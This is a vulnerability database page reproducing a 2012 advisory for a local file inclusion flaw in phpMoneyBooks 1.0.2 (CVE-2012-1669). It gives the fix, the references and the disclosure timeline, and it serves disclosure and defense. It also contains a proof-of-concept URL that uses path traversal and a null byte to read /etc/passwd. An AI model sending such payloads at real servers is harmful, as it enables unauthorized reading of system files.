Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtMark Stanislav1337DAY-ID-17801
HistoryMar 22, 2012 - 12:00 a.m.

phpMoneyBooks 1.0.2 Local File Inclusion

2012-03-2200:00:00
Mark Stanislav
0day.today
17
JSON

Exploit for php platform in category web applications

'phpMoneyBooks' Local File Inclusion (CVE-2012-1669)
Mark Stanislav - [emailΒ protected]
I. DESCRIPTION
---------------------------------------
A vulnerability exists in index.php for module handling that allows for local file inclusion using a null-byte attack on the 'module' GET parameter.
II. TESTED VERSION
---------------------------------------
1.0.2
III. PoC EXPLOIT
---------------------------------------
http://localhost/phpMoneyBooks102/index.php?module=../../../../../etc/passwd%00
IV. NOTES
---------------------------------------
* magic_quotes_gpc must be disabled and PHP must be < 5.3.4 for null-byte attacks to work
V. SOLUTION
---------------------------------------
Upgrade to 1.0.3 or above.
VI. REFERENCES
---------------------------------------
http://phpmoneybooks.com/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1669
VII. TIMELINE
---------------------------------------
02/29/2012 - Initial vendor disclosure
03/01/2012 - Vendor patched and released an updated version
03/22/2012 - Public disclosure



#  0day.today [2018-01-26]  #

Related

cve 2
prion 2
packetstorm 1
securityvulns 2
nvd 2
dsquare 1
cvelist 2
exploitpack 1
exploitdb 1
cve
cve
CVE-2012-1669
2014-11-17 22:59:00
CVE-2012-6665
2014-11-17 22:59:01
prion
prion
Directory traversal
2014-11-17 22:59:00
Directory traversal
2014-11-17 22:59:00
packetstorm
packetstorm
phpMoneyBooks 1.0.2 Local File Inclusion
2012-03-23 00:00:00
securityvulns
securityvulns
&#39;phpMoneyBooks&#39; Local File Inclusion &#40;CVE-2012-1669&#41;
2012-04-09 00:00:00
Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
2012-04-09 00:00:00
nvd
nvd
CVE-2012-1669
2014-11-17 22:59:00
CVE-2012-6665
2014-11-17 22:59:01
dsquare
dsquare
phpMoneyBooks LFI
2012-03-27 00:00:00
cvelist
cvelist
CVE-2012-1669
2014-11-17 22:00:00
CVE-2012-6665
2014-11-17 22:00:00
exploitpack
exploitpack
phpMoneyBooks 1.0.2 - Local File Inclusion
2012-03-22 00:00:00
exploitdb
exploitdb
phpMoneyBooks 1.0.2 - Local File Inclusion
2012-03-22 00:00:00
JSON
Related for 1337DAY-ID-17801
cve2prion2packetstorm1securityvulns2nvd2dsquare1cvelist2exploitpack1exploitdb1